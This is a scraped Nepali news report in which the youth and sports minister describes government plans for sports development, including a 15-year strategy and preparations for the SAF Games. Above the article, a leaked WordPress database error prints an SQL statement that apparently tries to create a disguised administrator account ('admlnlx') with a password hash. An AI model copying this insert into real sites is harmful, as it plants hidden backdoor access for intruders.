WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BP1o.CiU1YsMKhLO0MQ62mEgDVKvwK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:52:17', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १५ –
युवा तथा खेलकुदमन्त्री दलजित श्रीपाइलीले नेपालको खेलकुद क्षेत्र पछिल्लो समय सकारात्मक रुपमा अगाडि बढेको बताउनुभएको छ ।
रिपोर्टर्स क्लब नेपालले आज यहाँ आयोजना गरेको साक्षात्कारमा उहाँले सरकारले १५ वर्षे खेलकुद रणनीति योजना बनाउन लागेको जानकारी दिनुभयो ।
मन्त्री श्रीपाइलीलले “खेलकुद विकासका लागि खेलकुद विश्वविद्यालय, खेलकुद अस्पताल, खेलाडी बिमा र खेलाडी परिचयपत्र दिन लागेका छौँ” भन्दै एक करोडभन्दा बढी जनसङ्ख्या रहेको युवालाई विकास निर्माणमा कसरी लगाउन सकिन्छ भन्ने बारेमा सरकारले योजना बनाएर कार्य गरिरहेको बताउनुभयो ।
सन् २०१९ मा हुन लागेको १३ औँ साफ प्रतियोगिताका लागि पूर्वाधार निर्माणलाई सरकारले उच्च प्राथमिकता दिएको चर्चा गर्दै उहाँले ओलम्पिक क्षेत्रमा देखिएको विवादलाई मिलाएर अगाडि बढ्न लागेको बताउनुभयो ।
मन्त्री श्रीपाइलीले युवा परिषद्मा सबैलाई समेटेर अगाडि बढ्ने प्रतिवद्धता समेत व्यक्त गर्नुभयो । – रासस